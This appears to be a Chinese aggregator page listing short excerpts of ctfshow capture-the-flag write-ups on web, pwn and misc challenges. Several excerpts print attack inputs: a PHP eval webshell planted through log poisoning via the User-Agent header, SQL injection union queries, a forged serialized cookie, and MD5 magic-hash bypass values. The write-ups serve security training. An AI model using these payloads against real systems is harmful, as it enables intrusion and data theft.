ICode9

精准搜索请尝试: 精确搜索
  • ctfshow WEB入门 信息收集 1-202021-12-08 12:00:44

    web1 题目:开发注释未及时删除  查看页面源代码即可 web2 题目:js把鼠标右键和f12屏蔽了 方法一: 禁用JavaScript 方法二: url前面加上view-source: web3 题目:抓个包试试 抓包在请求包发现flag web4 题目:总有人把后台地址写入robots 访问robots.txt后得到后台地址,访问得到flag web5

  • ctfshow pwn pwn02 同时也作为入门题目无比细致讲解分析 真0基础入门2021-12-05 12:34:41

    pwn 正所谓万事开头难,打开这篇文章也将可能成为你进入pwn世界的叩门石。由于本文过于详细,会耽搁大佬很多时间,同时本人学识尚浅,如有错误请指正。 我们先打开题目 launch an instance创建容器,创建容器后就会显示相应的host与port stack是可以下载的附件,就是我们要寻找漏洞的程序,点

  • CTFshow 命令执行 web682021-12-04 23:01:37

    目录 源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和

  • CTFshow 命令执行 web662021-12-03 20:30:46

    目录 源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在

  • CTFshow 击剑杯 部分WP2021-11-13 19:32:17

    摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc中文识别带师 2.Web简单的验证码easyPOP 3.Pwnpwn01-My_sword_is_readypwn02-Precision_and_grace 4.Osint英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多

  • CTFshow_信息收集2021-11-11 15:00:41

    文章目录 web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20 web1 直接查看源代码就可以看到flag web2 无法直接查看源代码了 在url前加上view-source: flag就在源代码中 web3 同样看不到源码,根据提示那就抓个包 出flag

  • CTFshow JWT2021-11-07 20:00:22

    前置知识: jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完 整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的 信息,JWT可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递 声

  • ctfshow-命令执行-web372021-11-03 19:00:42

    ctfshow-web37 文章目录 ctfshow-web37题目描述:原理:审计: 方法:思路:利用文件按包含漏洞,data协议 Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 20

  • CTFSHOW-WEB入门代码审计篇2021-11-02 14:00:42

    web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password']

  • ctfshow_反序列化上2021-10-30 21:31:46

    web254 ?username=xxxxxx&password=xxxxxx web255 cookie: user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D web256 cookie: O%3A11%3A%

  • CTFshow 命令执行 web322021-10-29 15:03:09

    源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['

  • CTFshow—Misc入门1—23以及41(基础操作+信息附加)2021-10-28 11:01:59

    文章目录 Misc1Misc2Misc3Misc4Misc5Misc6Misc7Misc8Misc9Misc10Misc11Misc12Misc13Misc14Misc15Misc16Misc17Misc18Misc19Misc20Misc21Misc22Misc23Misc41 Misc1 很明显 Misc2 打开文本后发现大量乱码,010查看后是png 修改后缀拿到flag Misc3 bpg格式图片,推荐使用蜂蜜浏

  • CTFshow 信息收集 web12021-10-22 13:05:49

    打开页面,发现下面这段提示 按照惯例,先看一下网页源码,找到flag    

  • ctfshow-web52021-10-20 15:31:45

         审计代码发现 需要v1是字符串,v2是数字       PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。这样最后php解析到的v1和v2的md5值就都是0了 构造v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD50e开头的md5和

  • ctfshow-web42021-10-20 15:01:58

         打开之后发现和web3有点像,但是用之前的方法做不出来了     传参url=/var/log/nginx/access.log获取日志目录      使用burpsuite抓包 在User-Agent中加入一句话木马 <?php @eval($_POST['a'];?>     使用蚁剑连接   得到flag    ctfshow{f755138b-0c50-45

  • ctfshow misc 图片入门篇2021-10-19 02:00:06

    ctfshow misc 图片继承篇 以下题目均来自ctfshow,本鸟人才瘾大,若有错误,望大佬们指出 misc 1 下载下来得到一张图片,图片内容就是flag。 misc 2 下载解压后得到的是一个misc2.txt,记住misc体不要相信题目所给附件的后缀,直接使用记事本打开得到一堆乱码的数据,那我们使用winhex打开,发现

  • ctfshow web(非web入门)2021-10-16 21:05:00

    web签到题 查看源代码: base64解码即可: web2 题目提示:最简单的sql注入 使用admin’or 1=1#登录成功 admin’ union select 1,2,3# 获得注入位置 admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

  • CTFSHOW WEB入门 反序列化篇2021-10-16 01:01:04

    web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(_

  • ctfshow-aihe2021-10-15 20:04:12

      文件下载地址  https://www.lanzoui.com/i98mzhg 打开之后是一个MP3文件,各种音频隐写尝试后,并没有用 在kail中使用foremost分离出一个图片      可以发现图片的高并不是很完整 使用010打开图片,修改图片的高    再次打开后发现猪圈密码    猪圈密码    得出flag

  • ctfshow thinkphp专题2021-10-13 19:01:35

    前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本题使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有

  • CTFSHOW-PHP特性2021-10-09 21:59:04

    WEB89 题目: <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)

  • CTFSHOW-日刷-[baby杯]babyphp/弱类型比较2021-10-08 09:35:54

    代码审计 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-05-31 13:40:37 # @Last Modified by: h1xa # @Last Modified time: 2021-05-31 16:36:27 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); class fileUtil{

  • CTFSHOW-日刷-[萌新赛]萌新记忆/sql盲注2021-10-07 18:32:04

       有4个段子,查看前端没思路,开扫描    发现存在admin目录    发现存在注入    fuzz测试一波     发现括号 | 没过滤,其他比如 or and & # -- 啥的全都过滤了,而||就是or,有or就可以注入 首先测试观察可知,输入admin,密码随便输入会提示密码错误,反之会提示 用户名/密码错

  • ctfshow_web 入门 文件上传2021-10-07 15:02:26

    文件上传 还是是一边学习一边做笔记的文章,由于是学习,所以会显得啰嗦 还请各位师傅担待~ 如果有不正确的地方,请师傅们斧正谢谢师傅们 web150 火狐关闭js的插件一旦开启,就没法点击上传按钮了。 而且这里没法上传.php .jpg等后缀文件,只能选择png格式图片。所以只能以够抓包然后修改内

  • CTFSHOW sql注入(一)2021-10-04 18:03:44

    title: CTFSHOW-sql注入(一) data: 2021-09-15 tags: CTF-web CTFSHOW sql注入(一) 开始一周的高强度sql注入训练,先从ctfshow 的基础开始。 包含了CTFSHOW sql注入的 170-200题。 这里都是sql注入的一些基本知识点。主要是了解sql注入的常见题型。 题目 web 171(万能密码)

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有